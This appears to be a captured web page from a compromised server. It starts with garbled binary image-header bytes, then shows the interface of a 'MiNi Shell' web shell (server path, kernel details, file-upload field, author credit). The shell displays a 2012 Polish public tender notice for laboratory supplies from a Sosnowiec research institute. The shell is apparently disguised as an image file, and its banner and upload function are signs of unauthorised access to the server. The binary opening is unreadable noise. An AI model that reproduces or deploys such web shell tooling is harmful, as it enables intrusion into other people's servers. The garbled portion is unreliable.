JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120925/364558-N-2012.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa drobnego sprzętu laboratoryjnego dla  Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu</b><br>
<b>Numer ogłoszenia: 364558 - 2012; data zamieszczenia: 25.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawaczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa drobnego sprzętu laboratoryjnego dla  Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1
 
L.p Asortyment J.m. Ilość
			
1.Szkiełka nakrywkowe mikroskopowe 22x22 mm	szt 1000
2.Szkiełka podstawowe z dwustronnie matowym brzegiem z ciętymi krawędziami wym. 76x26x1mm	szt 11000
3.Szkiełka podstawowe z jednostronnie matowym brzegiem z szlifowanymi krawędziami wym. 76x26x1mm szt 500
4.Pinceta z koncówkami zaokrąglonymi ze stali nierdzewnej 300 mm szt 3
5.Szkiełka nakrywkowe wym 24x50mm  szt 15000
6.Nakłuwacze sterylne 1.8 mm szt 200
7.Statywy metalowe 20 pozycyjne na probówki o średnicy od 20-25 mm szt	10
8.Statywy metalowe 40 pozycyjne na probówki o średnicy od 20-25 mm szt	5
9.Parafilm 100mm dł 38mb szt 1		
10. Pojemnik pionowy z pokrywką typu Hellendhola wykonany ze szkła, do barwienia 8na16 szkiełek szt 4
11.Szczotki do probówek o śrenicy 20mm pak po 5szt szt 20
12 Szczotki do probówek o średnicy 25mm pakowane po 5szt szt 30

Pakiet 2

L.p Asortyment J.m. Ilość
			
1.Końcówki do pipet automatycznych 200 pasujące do raków i pudełek OMNITIP szt 20000
2.Końcówki do pipet automatycznych 1000 pasujące do raków i pudełek OMNITIP szt 13000
3.Końcówki do pipet automatycznych 10 ml szt 200
4.Końcówki do pipet automatycznych typu Gilson żółte o poj  200 ul szt 5000
5.Końcówki do pipet automatycznych typu Gilson niebieskie o poj. 1000 ul szt 6000
6.Końcówki do pipet bezbarwne poj. 1000-5000 szt 2700

Warunkiem przystapienia do Pakietu 2 jest dostarczenie  przez Wykonawcę po jednej próbce poz. 1.2.3.4.5.6.

Pakiet  3 

L.p Asortyment J.m. Ilość
1.Kolby miarowe o poj 200ml okrągłe płaskodenne z długą szyjką szt 10
2.Cylindry ze stopką i skala o poj  50 ml szt 10
3.Cylindry ze stopką i skala o poj  100 ml szt  10

Pakiet 4
 
L.p Asortyment J.m. Ilość
			
1.Pisaki laboratoryjne Sharpie lub równoważne, wodoodporne, długopiszące, kolor czarny, grubość lini 1,5 mm	szt 65
2.Pisaki laboratoryjne Sharpie lub równoważne, wodoodporne, długopiszące, kolor czarny, grubość lini 0,7 mm	szt 30
3.Nalepki 55x 22 mm  bez nadruku, samoprzylepne  na pojemniki i probówki laboratoryjne szt 500

Pakiet 5

L.p	Asortyment	J.m.	Ilość			
1.Worki do sterylizacji, czerwone, z napisem Biohazard, wymiary 910 x 610 mm szt 100
2.Worki do sterylizacji, czerwone, z napisem Biohazard, wymiary 760 x 610 mm szt 100
3.Worki do sterylizacji, czerwone, z napisem Biohazard, wymiary 280 x 220 mm szt 200


Pakiet 6

L.p Asortyment J.m. Ilość
			
1.Filtry membranowe  z nitrocelulozy, średnica f 25 mm, średnica porów 0,8 szt 200 
2.filtry kwarcowe 100% kwarc, średnica 37mm,  średnica porów 1,2 m szt 200 
3.Kasety Petri Dish Slide, do transportu filtrów, średnica 47mm szt 100 


Pakiet 7
 
L.p Asortyment J.m. Ilość
			
1.Bibuła jakościowa średnia 45x56cm	szt 600
2.Sączki Whatman GFnaA śr. 5,0 cm. 	szt 100
3.Sączki Whatman GFnaA śr. 3,7 cm.	szt 200
4.Gilzy estrakcyjne celulozowe, 25x80 mm, Grade 35 szt 1000
5.Filtry z włókna szklanego do Staplexa, rozmiar 10,16 cm  szt 200
6.Filtry membranowe MCE mieszanina estrów celulozy, średnica f 47 mm, średnica porów 0,45 białe szt 200


Pakiet 8

L.p Asortyment J.m. Ilość
			
1.Pipety plastikowe 2 ml sterylne, wolne od pyrogenów pojedynczo pakowane szt 100
2.Probówki typu Falcon z PP stożkowodenne skalowane z nakrętką z miejscm na opis, sterylne poj 15ml szt 1550
3.Probówki typu Falcon plastikowe, skalowane z nakrętką i miejscem na opis, sterylne poj 50ml	szt.	1050
4.Probówki plastikowe z zakrętką typu Falcon 30ml ze skalą i miejscem na opis szt 1000
5.Szalki Petriego z polistyrenu śr.90mm z żebrami  wentylacyjnymi, sterylne szt 6000
6.Szalki RODAC szt 1000
7.Ezy kalibrowane z oczkiem 10sterylne, pakowane po 20 sztuk szt 1100
8.Wymazówki z tworzywa sztucznego w probówce transportowej bez podłoża , sterylne dł 20 cm	szt.1000
9.Wymazówki z tworzywa sztucznego w bez podłoża ,sterylne dł 16cm, średnica 2,5 mm pojedynczo pakowane szt. 2000
10.Wymazówki z tworzywa sztucznego z podłożem transportowym  AMIE , sterylne szt.3000
11.Wymazówki z tworzywa sztucznego z podłożem transportowym  AMIE z węglem ,sterylne	szt 450
12.Wymazówki z wacikiem bawełnianym o śr 1,5mm, pakowane indywidualnie , sterylne, okulistyczne, nie na druciku	szt.	300
13.Pipetki Pasteura z PE o dł. 15,5cm ,o poj. 3ml z  podziałką 3,0na05 ml, pakowane po 5 sztuk, sterylne	szt.	1000
14.Butelki hodowlane T75cm2 vent close 5 na100	szt.	100
15.Pipety plastikowe serologiczne jałowe poj. Do 5ml wolne od pyrogenów szt 200
16.Pipety plastikowe serologiczne jałowe poj. Do 10ml wolne od pyrogenów szt 200
17.Cell Scrapers dł. 25cm sterylne z ruchomą końcówką o dł. 1,8cm szt 200
18.Pipety plastikowe serologiczne jałowe poj. Do 25ml wolne od pyrogenów szt 200
19.Probówki do PCR poj. 0,2ml cienkościenne, z płaskimi wieczkami dostarczone ze świadectwem jakości PCR szt 7000


Warunkiem przystapienia do Pakietu 8 jest dostarczenie  przez Wykonawcę po jednej próbce poz. 2,3,4,12.


Pakiet 9

L.p Asortyment J.m. Ilość
			
1.Folia aluminiowa  0,040 x 500mm kg	2 rolki
2.Folia aluminiowa  0,030 x 500mm kg	1 rolka


Pakiet 10

L.p Asortyment J.m. Ilość
			
1.Płytki 96dołkowe sterylne z pokrywką, kszt. Dna U, suger. obj. Dołka 0,2ml, pow. hodowl. 0,36cm2 dołek, wym. zewn. 128x86mm	szt 100
2.Płytki 24dołkowe z polystyrenu sterylne z pokrywką, z płaskim dnem, pakowane pojedynczo. Objętość robocza dołka  1ml, transparentne	szt 75
3.Płytki 384dołkowe z polystyrenu sterylne z pokrywką, z płaskim dnem, pakowane w rękawach po 10 sztuk, transparentne, niemodyfikowane szt 120

Pakiet 11
L.p Asortyment J.m. Ilość


1.Pojemniki na odpady medyczne, wiadro poj. 10l szt 100
2.Pojemniki na mocz 120do140 ml z zakrętką szt 4500
3.Pojemniki na kał	szt 1000
4.Pojemniki na mocz o poj. 60 ml z zkretką, pakowane indywidualnie, asceptyczn szt 1250
5.Pojemnik na odpady kwasoodporne 5 l. szt 12
6.Pojemnik na zlewki organiczne z tworzywa, pojemność 5,0 lub 10 litrów szt	40
7.Pojemnik na odpady, z tworzywa, pojemność 5,0 litrów	szt 60

Pakiet 12

L.p Asortyment J.m. Ilość
			
1.Rękawice jednorazowe nitrylowe 0,1 mm, S	szt 4000
2.Rękawice jednorazowe nitrylowe 0,1 mm, M	szt 2000
3.Rękawice jednorazowe nitrylowe 0,1 mm, L	szt 1000
4.Rękawice jednorazowe lateksowe S nie pudrowe szt 3500
5.Rękawice jednorazowe lateksowe M szt 200
6.Rękawice jednorazowe lateksowe L  szt 200

Pakiet 13
 
L.p Asortyment J.m. Ilość
			
1.Końcówki do pipet automatycznych, sterylne, wolne od pyrogenów  ep TIPS Biopur 50-1000  w pudelkach 5x96 op 10
2.Końcówki do pipet automatycznych, sterylne, wolne od pyrogenów  ep TIPS Biopur 2-200  w pudelkach 5x96 op 12
3.Końcówki do pipet automatycznych, sterylne, wolne od pyrogenów ep TIPS Biopur 500-2500 ?l w pudelkach 5x48 op 5
4.Końcówki sterylne TIPSSet poj. 0,1-10ml Reloads PCR clean op 12
5.Końcówki sterylne z filtrem poj. 10ml Low Retention op 6
6.Końcówki sterylne z filtrem poj. 100ml Low Retention op	 4
7.Końcówki do pipet automatycznych, sterylne, wolne od pyrogenów  ep TIPS Biopur 20-300  w pudelkach 5x96 op 5
8.Końcówki sterylne z filtrem poj. 1000ml PCR clean, sterylne wolne od pyrogenów op 5
9.Końcówki typu Eppendorf poj. 50-1000 pasujące do raków i pudełek ep TIPS Box op 16
10.Końcówki typu Eppendorf poj. 2-200pasujące do raków i pudełek ep TIPS Box op 20
11.Probówki typu Eppendorf poj. 1,5ml PCR Clean wolne od RNazy dostarczone ze świadectwem standardu jakości PCR  op 5
12. Probówki typu Eppendorf poj. 0,5ml PCR Clean wolne od RNazy dostarczone ze świadectwem standardu jakości PCR op 5
13. Probówki do wirówki typu Eppendorf polipropylenowe z dnem stośkowym o poj. 1,5 ml, z miejscem do opisania probówki op 2

Warunkiem przystąpnienia do pakietu nr 13 jest spełnienie wymagań zawartych w specyfikacji rysunki.

Pakiet 14
Lp. Asortyment J.m. Ilość		
1. Palnik rtęciowy 100W USH -103OL	szt.	1

Pakiet 15 Wyposażenie do chromatografu gazowego Carlo Erba

L.p Asortyment J.m. Ilość
			
1.Strzykawki do chromatografu Carlo Erba typu Hamilton pokryte teflonem szt 25
2.Komplet igieł typu Hamilton 7758-02RN HDL 6PK 26s2V2 S REV A	szt 4
3.Septa thermolite BTO 17 mm Center Guide 50pk szt 100

Pakiet 16 Wyposażenie do chromatografii cienkowarstwowej

L.p Asortyment J.m. Ilość
			
1.Płytki szklane do chromatografii cienkowarstwowej pokryte żelem krzemionkowym 5x20, SIL G-25UV szt 200


Pakiet 17

L.p Asortyment J.m. Ilość
			
1.Fiolki do autosamplera firmy Agilent Technologies i Varian, poj. 2 ml, śr. 12 mm szt 10000
2.Kapsle do fiolek do autosamplera firmy Agilent Technologies i Varian,śr 11 mm aluminium	 szt 10000

Pakiet 18 

L.p Asortyment J.m. Ilość
			
1.Rurki z węglem aktywnym SKC, 20 na40 mesh, 50na100 mg, type A - Tube holder, 6 mm x 70 mm szt 500
2.Rurki sorbentowe SKC, Formaldehyde Sampling Tube, silica gel coated with 2,4-dinitrophenylhydrazine, 150na300 mg,	szt 500

Pakiet 19 

L.p Asortyment J.m. Ilość
			
1.Probówki do wirówki typu Eppendorf polipropylenowe, okrągłodenne o poj. 2 ml, z miejscem do opisania próbki, wypustką, która uniemożliwia samoczynne otwarcie się probówki, o podwyższonej przezroczystości	szt 12000
2. Probówki do wirówki typu Eppendorf polipropylenowe, z dnem stośkowym o poj. 2 ml, z miejscem do opisania próbki, wypustką, która uniemożliwia samoczynne otwarcie się probówki, o podwyższonej przezroczystości	szt 500

Pakiet 20


L.p Asortyment J.m. Ilość
			
1.Fiolki szklane zakręcane poj 20 - 25 ml, zakrętki z tworzywa sztucznego z uszczelkami pokrytymi teflonem szt 100


Pakiet 21 


L.p Asortyment J.m. Ilość
			
1.Rurki grafitowe THGA do Spektrometru Absorpcji Atomowej PERKIN ELMER 4100ZL Graphite Tubes With End Caps szt 15
2.Kubeczki polistyrenowe do automatycznego podajnika próbek poj. 2ml do Spektrometru Absorpcji Atomowej PERKIN ELMER 4100 szt 5000


Pakiet 22

L.p Asortyment J.m. Ilość
			
1. Kuweta szklana o wymiarach 45x12,5x12,5mm, o pojemności 3,5ml i o drodze optycznej 10mm z pokrywką z PTFE szt 6
2 Kuweta kwarcowa o wymiarach 45x12,5x12,5mm, o pojemności 3,5ml i drodze optycznej 10mm z pokrywką PTFE szt 	2


Pakiet 23

L.p Asortyment J.m. Ilość
			
1. Końcówka wraz z tłokiem, model CP10 do pipety Microman M10	szt 192
2 Końcówka wraz z tłokiem, model CP100 do pipety Microman M100	szt 192
3. Końcówka wraz z tłokiem, model CP1000 do pipety Microman M1000 szt. 182.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 18.93.00.00-7, 33.14.13.10-6, 19.52.00.00-7, 33.19.25.00-7, 38.00.00.00-5, 38.43.70.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2012 godzina 10:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com